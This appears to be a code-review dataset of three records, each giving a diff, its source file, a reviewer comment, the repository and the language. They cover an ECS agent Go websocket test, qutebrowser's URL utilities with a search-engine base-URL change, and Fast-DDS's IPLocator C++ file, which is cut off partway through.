testServer := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(400)
w.Write([]byte(`{"InvalidClusterException":"Invalid cluster"}` + "\n"))
}))
defer testServer.Close()
cs := New(testServer.URL, testCfg, testCreds, rwTimeout)
err := cs.Connect()
_, ok := err.(*wsclient.WSError)
assert.True(t, ok, "Connect error expected to be a WSError type")
assert.EqualError(t, err, "InvalidClusterException: Invalid cluster")
}
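// testCS wires the provided mock websocket connection into a freshly built ACS client server
// so tests can drive the client without a real network connection.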
func testCS(conn *mock_wsconn.MockWebsocketConn) wsclient.ClientServer {
foo := New("localhost:443", testCfg, testCreds, rwTimeout)
cs := foo.(*clientServer)
cs.SetConnection(conn)
return cs
}
// TODO: replace with gomock
func startMockAcsServer(t *testing.T, closeWS <-chan bool) (*httptest.Server, chan<- string, <-chan string, <-chan error, error) {
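	// serverChan pushes messages to the connected client, requestsChan exposes what the
	// client sent to the server, and errChan reports server-side failures.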
serverChan := make(chan string)
requestsChan := make(chan string)
errChan := make(chan error)
upgrader := websocket.Upgrader{ReadBufferSize: 1024, WriteBufferSize: 1024}
handler := http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
ws, err := upgrader.Upgrade(w, r, nil)
go func() {
<-closeWS
ws.Close()
}()
if err != nil {
errChan <- err
}
go func() {
_, msg, err := ws.ReadMessage()
if err != nil {
errChan <- err
} else {
requestsChan <- string(msg)
}
}()
for str := range serverChan {
err := ws.WriteMessage(websocket.TextMessage, []byte(str))
if err != nil {
errChan <- err
}
}
})
server := httptest.NewTLSServer(handler)
return server, serverChan, requestsChan, errChan, nil
}
func TestAttachENIHandlerCalled(t *testing.T) {
ctrl := gomock.NewController(t)
defer ctrl.Finish()
conn := mock_wsconn.NewMockWebsocketConn(ctrl)
cs := testCS(conn)
defer cs.Close()
// Messages should be read from the connection at least once
conn.EXPECT().SetReadDeadline(gomock.Any()).Return(nil).MinTimes(1)
conn.EXPECT().ReadMessage().Return(websocket.TextMessage,
[]byte(sampleAttachENIMessage), nil).MinTimes(1)
// Invoked when closing the connection
conn.EXPECT().SetWriteDeadline(gomock.Any()).Return(nil)
conn.EXPECT().Close()
messageChannel := make(chan *ecsacs.AttachTaskNetworkInterfacesMessage)
reqHandler := func(message *ecsacs.AttachTaskNetworkInterfacesMessage) {
messageChannel <- message
}
cs.AddRequestHandler(reqHandler)
go cs.Serve()
expectedMessage := &ecsacs.AttachTaskNetworkInterfacesMessage{
MessageId: aws.String("123"),
ClusterArn: aws.String("default"),
TaskArn: aws.String("task"),
ElasticNetworkInterfaces: []*ecsacs.ElasticNetworkInterface{
{AttachmentArn: aws.String("attach_arn"),
Ec2Id: aws.String("eni_id"),
Ipv4Addresses: []*ecsacs.IPv4AddressAssignment{
{
Primary: aws.Bool(true),
PrivateAddress: aws.String("ipv4"),
},
},
Ipv6Addresses: []*ecsacs.IPv6AddressAssignment{
{
Address: aws.String("ipv6"),
},
},
MacAddress: aws.String("mac"),
},
},
}
assert.Equal(t, <-messageChannel, expectedMessage)
}
func TestAttachInstanceENIHandlerCalled(t *testing.T) {
ctrl := gomock.NewController(t)
defer ctrl.Finish()
conn := mock_wsconn.NewMockWebsocketConn(ctrl)
cs := testCS(conn)
defer cs.Close()
// Messages should be read from the connection at least once
conn.EXPECT().SetReadDeadline(gomock.Any()).Return(nil).MinTimes(1)
conn.EXPECT().ReadMessage().Return(websocket.TextMessage,
[]byte(sampleAttachInstanceENIMessage), nil).MinTimes(1)
// Invoked when closing the connection
conn.EXPECT().SetWriteDeadline(gomock.Any()).Return(nil)
conn.EXPECT().Close()
messageChannel := make(chan *ecsacs.AttachInstanceNetworkInterfacesMessage)
reqHandler := func(message *ecsacs.AttachInstanceNetworkInterfacesMessage) {
messageChannel <- message
}
cs.AddRequestHandler(reqHandler)
go cs.Serve()
expectedMessage := &ecsacs.AttachInstanceNetworkInterfacesMessage{
MessageId: aws.String("123"),
ClusterArn: aws.String("default"),
ElasticNetworkInterfaces: []*ecsacs.ElasticNetworkInterface{
{AttachmentArn: aws.String("attach_arn"),
Ec2Id: aws.String("eni_id"),
Ipv4Addresses: []*ecsacs.IPv4AddressAssignment{
{
Primary: aws.Bool(true),
PrivateAddress: aws.String("ipv4"),
},
},
Ipv6Addresses: []*ecsacs.IPv6AddressAssignment{
{
Address: aws.String("ipv6"),
},
},
MacAddress: aws.String("mac"),
},
},
}
assert.Equal(t, <-messageChannel, expectedMessage)
}
| 1 | 26,583 | for my understanding - are this line and the next line both necessary? they seem to contain duplicate information. same for the other test files | aws-amazon-ecs-agent | go |
@@ -102,6 +102,13 @@ def _get_search_url(txt):
engine = 'DEFAULT'
template = config.val.url.searchengines[engine]
url = qurl_from_user_input(template.format(urllib.parse.quote(term)))
+
+ if config.val.url.open_base_url and \
+ term in config.val.url.searchengines.keys():
+ url = qurl_from_user_input(config.val.url.searchengines[term])
+ url.setPath(None)
+ url.setFragment(None)
+ url.setQuery(None)
qtutils.ensure_valid(url)
return url
| 1 | # vim: ft=python fileencoding=utf-8 sts=4 sw=4 et:
# Copyright 2014-2018 Florian Bruhin (The Compiler) <[email protected]>
#
# This file is part of qutebrowser.
#
# qutebrowser is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# qutebrowser is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with qutebrowser. If not, see <http://www.gnu.org/licenses/>.
"""Utils regarding URL handling."""
import re
import base64
import os.path
import ipaddress
import posixpath
import urllib.parse
from PyQt5.QtCore import QUrl, QUrlQuery
from PyQt5.QtNetwork import QHostInfo, QHostAddress, QNetworkProxy
from qutebrowser.config import config
from qutebrowser.utils import log, qtutils, message, utils
from qutebrowser.commands import cmdexc
from qutebrowser.browser.network import pac
# FIXME: we probably could raise some exceptions on invalid URLs
# https://github.com/qutebrowser/qutebrowser/issues/108
class InvalidUrlError(ValueError):
"""Error raised if a function got an invalid URL.
Inherits ValueError because that was the exception originally used for
that, so there still might be some code around which checks for that.
"""
def __init__(self, url):
if url.isValid():
raise ValueError("Got valid URL {}!".format(url.toDisplayString()))
self.url = url
self.msg = get_errstring(url)
super().__init__(self.msg)
def _parse_search_term(s):
"""Get a search engine name and search term from a string.
Args:
s: The string to get a search engine for.
Return:
A (engine, term) tuple, where engine is None for the default engine.
"""
s = s.strip()
split = s.split(maxsplit=1)
if len(split) == 2:
engine = split[0]
try:
config.val.url.searchengines[engine]
except KeyError:
engine = None
term = s
else:
term = split[1]
elif not split:
raise ValueError("Empty search term!")
else:
engine = None
term = s
log.url.debug("engine {}, term {!r}".format(engine, term))
return (engine, term)
def _get_search_url(txt):
"""Get a search engine URL for a text.
Args:
txt: Text to search for.
Return:
The search URL as a QUrl.
"""
log.url.debug("Finding search engine for {!r}".format(txt))
engine, term = _parse_search_term(txt)
assert term
if engine is None:
engine = 'DEFAULT'
template = config.val.url.searchengines[engine]
url = qurl_from_user_input(template.format(urllib.parse.quote(term)))
qtutils.ensure_valid(url)
return url
def _is_url_naive(urlstr):
"""Naive check if given URL is really a URL.
Args:
urlstr: The URL to check for, as string.
Return:
True if the URL really is a URL, False otherwise.
"""
url = qurl_from_user_input(urlstr)
assert url.isValid()
if not utils.raises(ValueError, ipaddress.ip_address, urlstr):
# Valid IPv4/IPv6 address
return True
# Qt treats things like "23.42" or "1337" or "0xDEAD" as valid URLs
# which we don't want to. Note we already filtered *real* valid IPs
# above.
if not QHostAddress(urlstr).isNull():
return False
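    # Heuristic: only treat it as a URL if the host contains a dot and doesn't end with one.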
host = url.host()
return '.' in host and not host.endswith('.')
def _is_url_dns(urlstr):
"""Check if a URL is really a URL via DNS.
Args:
url: The URL to check for as a string.
Return:
True if the URL really is a URL, False otherwise.
"""
url = qurl_from_user_input(urlstr)
assert url.isValid()
if (utils.raises(ValueError, ipaddress.ip_address, urlstr) and
not QHostAddress(urlstr).isNull()):
log.url.debug("Bogus IP URL -> False")
# Qt treats things like "23.42" or "1337" or "0xDEAD" as valid URLs
# which we don't want to.
return False
host = url.host()
if not host:
log.url.debug("URL has no host -> False")
return False
log.url.debug("Doing DNS request for {}".format(host))
info = QHostInfo.fromName(host)
return not info.error()
def fuzzy_url(urlstr, cwd=None, relative=False, do_search=True,
force_search=False):
"""Get a QUrl based on a user input which is URL or search term.
Args:
urlstr: URL to load as a string.
cwd: The current working directory, or None.
relative: Whether to resolve relative files.
do_search: Whether to perform a search on non-URLs.
force_search: Whether to force a search even if the content can be
interpreted as a URL or a path.
Return:
A target QUrl to a search page or the original URL.
"""
urlstr = urlstr.strip()
path = get_path_if_valid(urlstr, cwd=cwd, relative=relative,
check_exists=True)
if not force_search and path is not None:
url = QUrl.fromLocalFile(path)
elif force_search or (do_search and not is_url(urlstr)):
# probably a search term
log.url.debug("URL is a fuzzy search term")
try:
url = _get_search_url(urlstr)
except ValueError: # invalid search engine
url = qurl_from_user_input(urlstr)
else: # probably an address
log.url.debug("URL is a fuzzy address")
url = qurl_from_user_input(urlstr)
log.url.debug("Converting fuzzy term {!r} to URL -> {}".format(
urlstr, url.toDisplayString()))
if do_search and config.val.url.auto_search != 'never' and urlstr:
qtutils.ensure_valid(url)
else:
if not url.isValid():
raise InvalidUrlError(url)
return url
def _has_explicit_scheme(url):
"""Check if a url has an explicit scheme given.
Args:
url: The URL as QUrl.
"""
# Note that generic URI syntax actually would allow a second colon
# after the scheme delimiter. Since we don't know of any URIs
# using this and want to support e.g. searching for scoped C++
# symbols, we treat this as not a URI anyways.
return (url.isValid() and url.scheme() and
(url.host() or url.path()) and
' ' not in url.path() and
not url.path().startswith(':'))
def is_special_url(url):
"""Return True if url is an about:... or other special URL.
Args:
url: The URL as QUrl.
"""
if not url.isValid():
return False
special_schemes = ('about', 'qute', 'file')
return url.scheme() in special_schemes
def is_url(urlstr):
"""Check if url seems to be a valid URL.
Args:
urlstr: The URL as string.
Return:
True if it is a valid URL, False otherwise.
"""
autosearch = config.val.url.auto_search
log.url.debug("Checking if {!r} is a URL (autosearch={}).".format(
urlstr, autosearch))
urlstr = urlstr.strip()
qurl = QUrl(urlstr)
qurl_userinput = qurl_from_user_input(urlstr)
if autosearch == 'never':
# no autosearch, so everything is a URL unless it has an explicit
# search engine.
try:
engine, _term = _parse_search_term(urlstr)
except ValueError:
return False
else:
return engine is None
if not qurl_userinput.isValid():
# This will also catch URLs containing spaces.
return False
if _has_explicit_scheme(qurl):
# URLs with explicit schemes are always URLs
log.url.debug("Contains explicit scheme")
url = True
elif qurl_userinput.host() in ['localhost', '127.0.0.1', '::1']:
log.url.debug("Is localhost.")
url = True
elif is_special_url(qurl):
# Special URLs are always URLs, even with autosearch=never
log.url.debug("Is a special URL.")
url = True
elif autosearch == 'dns':
log.url.debug("Checking via DNS check")
# We want to use qurl_from_user_input here, as the user might enter
# "foo.de" and that should be treated as URL here.
url = _is_url_dns(urlstr)
elif autosearch == 'naive':
log.url.debug("Checking via naive check")
url = _is_url_naive(urlstr)
else: # pragma: no cover
raise ValueError("Invalid autosearch value")
log.url.debug("url = {}".format(url))
return url
def qurl_from_user_input(urlstr):
"""Get a QUrl based on a user input. Additionally handles IPv6 addresses.
QUrl.fromUserInput handles something like '::1' as a file URL instead of an
IPv6, so we first try to handle it as a valid IPv6, and if that fails we
use QUrl.fromUserInput.
WORKAROUND - https://bugreports.qt.io/browse/QTBUG-41089
FIXME - Maybe https://codereview.qt-project.org/#/c/93851/ has a better way
to solve this?
https://github.com/qutebrowser/qutebrowser/issues/109
Args:
urlstr: The URL as string.
Return:
The converted QUrl.
"""
# First we try very liberally to separate something like an IPv6 from the
# rest (e.g. path info or parameters)
match = re.fullmatch(r'\[?([0-9a-fA-F:.]+)\]?(.*)', urlstr.strip())
if match:
ipstr, rest = match.groups()
else:
ipstr = urlstr.strip()
rest = ''
# Then we try to parse it as an IPv6, and if we fail use
# QUrl.fromUserInput.
try:
ipaddress.IPv6Address(ipstr)
except ipaddress.AddressValueError:
return QUrl.fromUserInput(urlstr)
else:
return QUrl('http://[{}]{}'.format(ipstr, rest))
def invalid_url_error(url, action):
"""Display an error message for a URL.
Args:
action: The action which was interrupted by the error.
"""
if url.isValid():
raise ValueError("Calling invalid_url_error with valid URL {}".format(
url.toDisplayString()))
errstring = get_errstring(
url, "Trying to {} with invalid URL".format(action))
message.error(errstring)
def raise_cmdexc_if_invalid(url):
"""Check if the given QUrl is invalid, and if so, raise a CommandError."""
if not url.isValid():
raise cmdexc.CommandError(get_errstring(url))
def get_path_if_valid(pathstr, cwd=None, relative=False, check_exists=False):
"""Check if path is a valid path.
Args:
pathstr: The path as string.
cwd: The current working directory, or None.
relative: Whether to resolve relative files.
check_exists: Whether to check if the file
actually exists on the filesystem.
Return:
The path if it is a valid path, None otherwise.
"""
pathstr = pathstr.strip()
log.url.debug("Checking if {!r} is a path".format(pathstr))
expanded = os.path.expanduser(pathstr)
if os.path.isabs(expanded):
path = expanded
elif relative and cwd:
path = os.path.join(cwd, expanded)
elif relative:
try:
path = os.path.abspath(expanded)
except OSError:
path = None
else:
path = None
if check_exists:
if path is not None:
try:
if os.path.exists(path):
log.url.debug("URL is a local file")
else:
path = None
except UnicodeEncodeError:
log.url.debug(
"URL contains characters which are not present in the "
"current locale")
path = None
return path
def filename_from_url(url):
"""Get a suitable filename from a URL.
Args:
url: The URL to parse, as a QUrl.
Return:
The suggested filename as a string, or None.
"""
if not url.isValid():
return None
pathname = posixpath.basename(url.path())
if pathname:
return pathname
elif url.host():
return url.host() + '.html'
else:
return None
def host_tuple(url):
"""Get a (scheme, host, port) tuple from a QUrl.
This is suitable to identify a connection, e.g. for SSL errors.
"""
if not url.isValid():
raise InvalidUrlError(url)
scheme, host, port = url.scheme(), url.host(), url.port()
assert scheme
if not host:
raise ValueError("Got URL {} without host.".format(
url.toDisplayString()))
if port == -1:
port_mapping = {
'http': 80,
'https': 443,
'ftp': 21,
}
try:
port = port_mapping[scheme]
except KeyError:
raise ValueError("Got URL {} with unknown port.".format(
url.toDisplayString()))
return scheme, host, port
def get_errstring(url, base="Invalid URL"):
"""Get an error string for a URL.
Args:
url: The URL as a QUrl.
base: The base error string.
Return:
A new string with url.errorString() is appended if available.
"""
url_error = url.errorString()
if url_error:
return base + " - {}".format(url_error)
else:
return base
def same_domain(url1, url2):
"""Check if url1 and url2 belong to the same website.
This will use a "public suffix list" to determine what a "top level domain"
is. All further domains are ignored.
For example, example.com and www.example.com are considered the same, but
example.co.uk and test.co.uk are not.
Return:
True if the domains are the same, False otherwise.
"""
if not url1.isValid():
raise InvalidUrlError(url1)
if not url2.isValid():
raise InvalidUrlError(url2)
suffix1 = url1.topLevelDomain()
suffix2 = url2.topLevelDomain()
if suffix1 == '':
return url1.host() == url2.host()
if suffix1 != suffix2:
return False
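    # Compare the label immediately to the left of the public suffix (the registrable domain).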
domain1 = url1.host()[:-len(suffix1)].split('.')[-1]
domain2 = url2.host()[:-len(suffix2)].split('.')[-1]
return domain1 == domain2
def encoded_url(url):
"""Return the fully encoded url as string.
Args:
url: The url to encode as QUrl.
"""
return bytes(url.toEncoded()).decode('ascii')
class IncDecError(Exception):
"""Exception raised by incdec_number on problems.
Attributes:
msg: The error message.
url: The QUrl which caused the error.
"""
def __init__(self, msg, url):
super().__init__(msg)
self.url = url
self.msg = msg
def __str__(self):
return '{}: {}'.format(self.msg, self.url.toString())
def _get_incdec_value(match, incdec, url, count):
"""Get an incremented/decremented URL based on a URL match."""
pre, zeroes, number, post = match.groups()
# This should always succeed because we match \d+
val = int(number)
if incdec == 'decrement':
if val <= 0:
raise IncDecError("Can't decrement {}!".format(val), url)
val -= count
elif incdec == 'increment':
val += count
else:
raise ValueError("Invalid value {} for incdec!".format(incdec))
if zeroes:
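        # Keep the padded width stable: drop a leading zero when the value gained a digit,
        # add one when it lost a digit.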
if len(number) < len(str(val)):
zeroes = zeroes[1:]
elif len(number) > len(str(val)):
zeroes += '0'
return ''.join([pre, zeroes, str(val), post])
def incdec_number(url, incdec, count=1, segments=None):
"""Find a number in the url and increment or decrement it.
Args:
url: The current url
incdec: Either 'increment' or 'decrement'
count: The number to increment or decrement by
segments: A set of URL segments to search. Valid segments are:
'host', 'port', 'path', 'query', 'anchor'.
Default: {'path', 'query'}
Return:
The new url with the number incremented/decremented.
Raises IncDecError if the url contains no number.
"""
if not url.isValid():
raise InvalidUrlError(url)
if segments is None:
segments = {'path', 'query'}
valid_segments = {'host', 'port', 'path', 'query', 'anchor'}
if segments - valid_segments:
extra_elements = segments - valid_segments
raise IncDecError("Invalid segments: {}".format(
', '.join(extra_elements)), url)
# Make a copy of the QUrl so we don't modify the original
url = QUrl(url)
# Order as they appear in a URL
segment_modifiers = [
('host', url.host, url.setHost),
('port', lambda: str(url.port()) if url.port() > 0 else '',
lambda x: url.setPort(int(x))),
('path', url.path, url.setPath),
('query', url.query, url.setQuery),
('anchor', url.fragment, url.setFragment),
]
# We're searching the last number so we walk the url segments backwards
for segment, getter, setter in reversed(segment_modifiers):
if segment not in segments:
continue
# Get the last number in a string
match = re.fullmatch(r'(.*\D|^)(0*)(\d+)(.*)', getter())
if not match:
continue
setter(_get_incdec_value(match, incdec, url, count))
return url
raise IncDecError("No number found in URL!", url)
def file_url(path):
"""Return a file:// url (as string) to the given local path.
Arguments:
path: The absolute path to the local file
"""
return QUrl.fromLocalFile(path).toString(QUrl.FullyEncoded)
def data_url(mimetype, data):
"""Get a data: QUrl for the given data."""
b64 = base64.b64encode(data).decode('ascii')
url = QUrl('data:{};base64,{}'.format(mimetype, b64))
qtutils.ensure_valid(url)
return url
def safe_display_string(qurl):
"""Get a IDN-homograph phishing safe form of the given QUrl.
If we're dealing with a Punycode-encoded URL, this prepends the hostname in
its encoded form, to make sure those URLs are distinguishable.
See https://github.com/qutebrowser/qutebrowser/issues/2547
and https://bugreports.qt.io/browse/QTBUG-60365
"""
if not qurl.isValid():
raise InvalidUrlError(qurl)
host = qurl.host(QUrl.FullyEncoded)
if '..' in host: # pragma: no cover
# WORKAROUND for https://bugreports.qt.io/browse/QTBUG-60364
return '(unparseable URL!) {}'.format(qurl.toDisplayString())
for part in host.split('.'):
if part.startswith('xn--') and host != qurl.host(QUrl.FullyDecoded):
return '({}) {}'.format(host, qurl.toDisplayString())
return qurl.toDisplayString()
def query_string(qurl):
"""Get a query string for the given URL.
This is a WORKAROUND for:
https://www.riverbankcomputing.com/pipermail/pyqt/2017-November/039702.html
"""
try:
return qurl.query()
except AttributeError: # pragma: no cover
return QUrlQuery(qurl).query()
class InvalidProxyTypeError(Exception):
"""Error raised when proxy_from_url gets an unknown proxy type."""
def __init__(self, typ):
super().__init__("Invalid proxy type {}!".format(typ))
def proxy_from_url(url):
"""Create a QNetworkProxy from QUrl and a proxy type.
Args:
url: URL of a proxy (possibly with credentials).
Return:
New QNetworkProxy.
"""
if not url.isValid():
raise InvalidUrlError(url)
scheme = url.scheme()
if scheme in ['pac+http', 'pac+https', 'pac+file']:
fetcher = pac.PACFetcher(url)
fetcher.fetch()
return fetcher
types = {
'http': QNetworkProxy.HttpProxy,
'socks': QNetworkProxy.Socks5Proxy,
'socks5': QNetworkProxy.Socks5Proxy,
'direct': QNetworkProxy.NoProxy,
}
if scheme not in types:
raise InvalidProxyTypeError(scheme)
proxy = QNetworkProxy(types[scheme], url.host())
if url.port() != -1:
proxy.setPort(url.port())
if url.userName():
proxy.setUser(url.userName())
if url.password():
proxy.setPassword(url.password())
return proxy
| 1 | 20,785 | No need for the `.keys()`, iterating over a dictionary gives you its keys (and thus you can also do `key in some_dict`). With that, it also fits on one line :wink: | qutebrowser-qutebrowser | py |
@@ -24,14 +24,6 @@ namespace eprosima {
namespace fastrtps {
namespace rtps {
-IPLocator::IPLocator()
-{
-}
-
-IPLocator::~IPLocator()
-{
-}
-
// Factory
void IPLocator::createLocator(
int32_t kindin, | 1 | // Copyright 2016 Proyectos y Sistemas de Mantenimiento SL (eProsima).
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
/**
* @file IPLocator.cpp
*
*/
#include <fastrtps/utils/IPLocator.h>
#include <fastrtps/utils/IPFinder.h>
namespace eprosima {
namespace fastrtps {
namespace rtps {
IPLocator::IPLocator()
{
}
IPLocator::~IPLocator()
{
}
// Factory
void IPLocator::createLocator(
int32_t kindin,
const std::string& address,
uint32_t portin,
Locator_t& locator)
{
locator.kind = kindin;
locator.port = portin;
LOCATOR_ADDRESS_INVALID(locator.address);
switch (kindin)
{
case LOCATOR_KIND_TCPv4:
case LOCATOR_KIND_UDPv4:
{
setIPv4(locator, address);
break;
}
case LOCATOR_KIND_TCPv6:
case LOCATOR_KIND_UDPv6:
{
setIPv6(locator, address);
break;
}
}
}
// IPv4
bool IPLocator::setIPv4(
Locator_t& locator,
const unsigned char* addr)
{
memcpy(&locator.address[12], addr, 4 * sizeof(char));
return true;
}
bool IPLocator::setIPv4(
Locator_t& locator,
octet o1,
octet o2,
octet o3,
octet o4)
{
LOCATOR_ADDRESS_INVALID(locator.address);
locator.address[12] = o1;
locator.address[13] = o2;
locator.address[14] = o3;
locator.address[15] = o4;
return true;
}
bool IPLocator::setIPv4(
Locator_t& locator,
const std::string& ipv4)
{
//std::string _ipv4 = IPFinder::getIPv4Address(ipv4);
std::stringstream ss(ipv4);
int a, b, c, d; //to store the 4 ints
char ch; //to temporarily store the '.'
if (ss >> a >> ch >> b >> ch >> c >> ch >> d)
{
LOCATOR_ADDRESS_INVALID(locator.address);
locator.address[12] = (octet)a;
locator.address[13] = (octet)b;
locator.address[14] = (octet)c;
locator.address[15] = (octet)d;
return true;
}
return false;
}
bool IPLocator::setIPv4(
Locator_t& destlocator,
const Locator_t& origlocator)
{
return setIPv4(destlocator, getIPv4(origlocator));
}
const octet* IPLocator::getIPv4(
const Locator_t& locator)
{
return static_cast<const octet*>(&locator.address[12]);
}
bool IPLocator::hasIPv4(
const Locator_t& locator)
{
return locator.address[12] != 0 &&
locator.address[13] != 0 &&
locator.address[14] != 0 &&
locator.address[15] != 0;
}
std::string IPLocator::toIPv4string(
const Locator_t& locator)
{
std::stringstream ss;
ss << (int)locator.address[12] << "."
<< (int)locator.address[13] << "."
<< (int)locator.address[14] << "."
<< (int)locator.address[15];
return ss.str();
}
bool IPLocator::copyIPv4(
const Locator_t& locator,
unsigned char* dest)
{
memcpy(dest, &(locator.address[12]), 4 * sizeof(char));
return true;
}
// IPv6
bool IPLocator::setIPv6(
Locator_t& locator,
const unsigned char* addr)
{
memcpy(locator.address, addr, 16 * sizeof(char));
return true;
}
bool IPLocator::setIPv6(
Locator_t& locator,
uint16_t group0,
uint16_t group1,
uint16_t group2,
uint16_t group3,
uint16_t group4,
uint16_t group5,
uint16_t group6,
uint16_t group7)
{
locator.address[0] = (octet)(group0 >> 8);
locator.address[1] = (octet)group0;
locator.address[2] = (octet)(group1 >> 8);
locator.address[3] = (octet)group1;
locator.address[4] = (octet)(group2 >> 8);
locator.address[5] = (octet)group2;
locator.address[6] = (octet)(group3 >> 8);
locator.address[7] = (octet)group3;
locator.address[8] = (octet)(group4 >> 8);
locator.address[9] = (octet)group4;
locator.address[10] = (octet)(group5 >> 8);
locator.address[11] = (octet)group5;
locator.address[12] = (octet)(group6 >> 8);
locator.address[13] = (octet)group6;
locator.address[14] = (octet)(group7 >> 8);
locator.address[15] = (octet)group7;
return true;
}
bool IPLocator::setIPv6(
Locator_t& locator,
const std::string& ipv6)
{
//std::string _ipv6 = IPFinder::getIPv6Address(ipv6);
std::vector<std::string> hexdigits;
size_t start = 0, end = 0;
std::string auxstr;
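    // Split on ':'; empty groups produced by the "::" abbreviation are recorded as
    // "EMPTY" placeholders.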
while (end != std::string::npos)
{
end = ipv6.find(':', start);
if (end - start > 1)
{
hexdigits.push_back(ipv6.substr(start, end - start));
}
else
{
hexdigits.push_back(std::string("EMPTY"));
}
start = end + 1;
}
    // Found a '.' in the last element (IPv4-mapped address), which is not supported here
if ((hexdigits.end() - 1)->find('.') != std::string::npos)
{
return false;
}
*(hexdigits.end() - 1) = (hexdigits.end() - 1)->substr(0, (hexdigits.end() - 1)->find('%'));
int auxnumber = 0;
uint8_t index = 15;
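    // Walk the groups from right to left, filling address bytes from the end until the
    // "EMPTY" placeholder ('::') is hit.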
for (auto it = hexdigits.rbegin(); it != hexdigits.rend(); ++it)
{
if (*it != std::string("EMPTY"))
{
if (it->length() <= 2)
{
locator.address[index - 1] = 0;
std::stringstream ss;
ss << std::hex << (*it);
ss >> auxnumber;
locator.address[index] = (octet)auxnumber;
}
else
{
std::stringstream ss;
ss << std::hex << it->substr(it->length() - 2);
ss >> auxnumber;
locator.address[index] = (octet)auxnumber;
ss.str("");
ss.clear();
ss << std::hex << it->substr(0, it->length() - 2);
ss >> auxnumber;
locator.address[index - 1] = (octet)auxnumber;
}
index -= 2;
}
else
{
break;
}
}
index = 0;
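    // Then walk from left to right, filling from the start and stopping again at the placeholder.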
for (auto it = hexdigits.begin(); it != hexdigits.end(); ++it)
{
if (*it != std::string("EMPTY"))
{
if (it->length() <= 2)
{
locator.address[index] = 0;
std::stringstream ss;
ss << std::hex << (*it);
ss >> auxnumber;
locator.address[index + 1] = (octet)auxnumber;
}
else
{
std::stringstream ss;
ss << std::hex << it->substr(it->length() - 2);
ss >> auxnumber;
locator.address[index + 1] = (octet)auxnumber;
ss.str("");
ss.clear();
ss << std::hex << it->substr(0, it->length() - 2);
ss >> auxnumber;
locator.address[index] = (octet)auxnumber;
}
index += 2;
}
else
{
break;
}
}
return true;
}
bool IPLocator::setIPv6(
Locator_t& destlocator,
const Locator_t& origlocator)
{
return setIPv6(destlocator, getIPv6(origlocator));
}
const octet* IPLocator::getIPv6(
const Locator_t& locator)
{
return locator.address;
}
bool IPLocator::hasIPv6(
const Locator_t& locator)
{
return locator.address[0] != 0 &&
locator.address[1] != 0 &&
locator.address[2] != 0 &&
locator.address[3] != 0 &&
locator.address[4] != 0 &&
locator.address[5] != 0 &&
locator.address[6] != 0 &&
locator.address[7] != 0 &&
locator.address[8] != 0 &&
locator.address[9] != 0 &&
locator.address[10] != 0 &&
locator.address[11] != 0 &&
locator.address[12] != 0 &&
locator.address[13] != 0 &&
locator.address[14] != 0 &&
locator.address[15] != 0;
}
std::string IPLocator::toIPv6string(
const Locator_t& locator)
{
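    // Render the 16-byte address as eight colon-separated hexadecimal groups.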
std::stringstream ss;
ss << std::hex;
for (int i = 0; i != 14; i += 2)
{
auto field = (locator.address[i] << 8) + locator.address[i + 1];
ss << field << ":";
}
auto field = locator.address[14] + (locator.address[15] << 8);
ss << field;
return ss.str();
}
bool IPLocator::copyIPv6(
const Locator_t& locator,
unsigned char* dest)
{
memcpy(dest, locator.address, 16 * sizeof(char));
return true;
}
// Abstract from IPv4 and IPv6
bool IPLocator::ip(
Locator_t& locator,
const std::string& ip)
{
if (locator.kind == LOCATOR_KIND_TCPv4 ||
locator.kind == LOCATOR_KIND_UDPv4)
{
return setIPv4(locator, ip);
}
else if (locator.kind == LOCATOR_KIND_TCPv6 ||
locator.kind == LOCATOR_KIND_UDPv6)
{
return setIPv6(locator, ip);
}
return false;
}
std::string IPLocator::ip_to_string(
const Locator_t& locator)
{
if (locator.kind == LOCATOR_KIND_TCPv4 ||
locator.kind == LOCATOR_KIND_UDPv4)
{
return toIPv4string(locator);
}
else if (locator.kind == LOCATOR_KIND_TCPv6 ||
locator.kind == LOCATOR_KIND_UDPv6)
{
return toIPv6string(locator);
}
return "";
}
// TCP
bool IPLocator::setLogicalPort(
Locator_t& locator,
uint16_t port)
{
uint16_t* loc_logical = reinterpret_cast<uint16_t*>(&locator.port);
#if FASTDDS_IS_BIG_ENDIAN_TARGET
loc_logical[0] = port; // Logical port is stored at 2nd and 3rd bytes of port
#else
loc_logical[1] = port; // Logical port is stored at 2nd and 3rd bytes of port
#endif // if FASTDDS_IS_BIG_ENDIAN_TARGET
return port != 0;
}
uint16_t IPLocator::getLogicalPort(
const Locator_t& locator)
{
const uint16_t* loc_logical = reinterpret_cast<const uint16_t*>(&locator.port);
#if FASTDDS_IS_BIG_ENDIAN_TARGET
return loc_logical[0];
#else
return loc_logical[1];
#endif // if FASTDDS_IS_BIG_ENDIAN_TARGET
}
bool IPLocator::setPhysicalPort(
Locator_t& locator,
uint16_t port)
{
uint16_t* loc_physical = reinterpret_cast<uint16_t*>(&locator.port);
#if FASTDDS_IS_BIG_ENDIAN_TARGET
loc_physical[1] = port; // Physical port is stored at 0 and 1st bytes of port
#else
loc_physical[0] = port; // Physical port is stored at 0 and 1st bytes of port
#endif // if FASTDDS_IS_BIG_ENDIAN_TARGET
return port != 0;
}
uint16_t IPLocator::getPhysicalPort(
const Locator_t& locator)
{
const uint16_t* loc_physical = reinterpret_cast<const uint16_t*>(&locator.port);
#if FASTDDS_IS_BIG_ENDIAN_TARGET
return loc_physical[1];
#else
return loc_physical[0];
#endif // if FASTDDS_IS_BIG_ENDIAN_TARGET
}
// TCPv4
bool IPLocator::setWan(
Locator_t& locator,
octet o1,
octet o2,
octet o3,
octet o4)
{
locator.address[8] = o1;
locator.address[9] = o2;
locator.address[10] = o3;
locator.address[11] = o4;
return true;
}
bool IPLocator::setWan(
Locator_t& locator,
const std::string& wan)
{
